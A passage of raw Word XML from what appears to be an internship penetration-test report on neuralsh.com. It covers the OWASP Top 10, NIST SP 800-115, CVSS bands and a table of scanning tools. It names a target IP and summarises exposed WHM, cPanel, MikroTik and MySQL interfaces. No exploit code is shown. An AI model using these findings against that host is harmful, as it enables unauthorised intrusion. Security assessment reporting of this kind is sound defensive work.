              <w:t>Code and infrastructure that does not verify integrity of updates or pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security Logging and Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Insufficient logging and alerting — allowing attacks to proceed undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Application fetches remote resources based on user-supplied input without validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 4: OWASP Top 10 (2021 — Current Reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Security Misconfiguration (A05) accounts for the majority of the 20 findings in this engagement, including the exposed WHM, cPanel, MikroTik, and MySQL interfaces. Identification and Authentication Failures (A07) covers the rate-limiting bypass and JWT token farming vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. NIST SP 800-115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 8: NIST logo — nist_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>NIST Special Publication 800-115: Technical Guide to Information Security Testing and Assessment provides a government-aligned methodology for security testing that emphasizes documentation, risk minimization, and traceability. It organizes security assessment activities into four phases: Planning (defining scope and rules of engagement), Discovery (information gathering and service enumeration), Attack (active exploitation under controlled conditions), and Reporting (documenting findings and recommendations). NIST SP 800-115 was used alongside PTES and OWASP WSTG during this internship to ensure the assessment approach met both academic rigor and industry practice expectations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Common Vulnerability Scoring System (CVSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[Figure 9: CVSS logo — cvss_logo.png]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Common Vulnerability Scoring System (CVSS) is the industry-standard framework for communicating the severity of security vulnerabilities. CVSS v3.1 was used throughout this engagement to assign an objective numeric severity score to each of the 20 findings.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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Score Range**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Severity**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Meaning**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8B0000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Exploitable remotely with no authentication; maximum business impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Significant risk; exploitable with minimal conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Moderate risk; requires specific conditions or limited impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="70AD47"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Minimal direct impact; informational or requires chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 5: CVSS v3.1 severity bands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The highest CVSS score recorded in this engagement was 10.0 for finding N-014 (WHM Root Administration Panel Publicly Exposed). The average CVSS score across all 20 findings was 6.6, placing the overall risk posture at the High-Medium boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHAPTER 3: RESEARCH METHODOLOGY AND TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>No single approach is sufficient to uncover all vulnerabilities in a modern web application. Automated scanners can rapidly map an attack surface but miss logic flaws and context-dependent weaknesses. Manual testing can identify those deeper issues but is too slow to cover every service and endpoint alone. For this reason, the VAPT engagement on neuralsh.com was conducted using a combination of three complementary approaches: automated scanning, manual testing, and AI-assisted analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1. Automated Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automated tools were used to perform broad, repeatable scans against the target infrastructure. These tools send structured probes to the target and return results that the assessor then interprets.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74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Tool**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Type**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Role in This Engagement**</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Nmap**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Network scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Full TCP port scan on 103.16.62.217 — discovered 23 open ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Nikto**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Automated web server scan — flagged missing headers, server version disclosure, directory listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Dirb**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Directory fuzzer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enumerated hidden directories and files on the web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**Nuclei**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Template scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Identified known vulnerability patterns across web services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**subfinder**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Subdomain enumerator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Passive subdomain discovery via certificate transparency and public DNS sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>**mysql-client**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
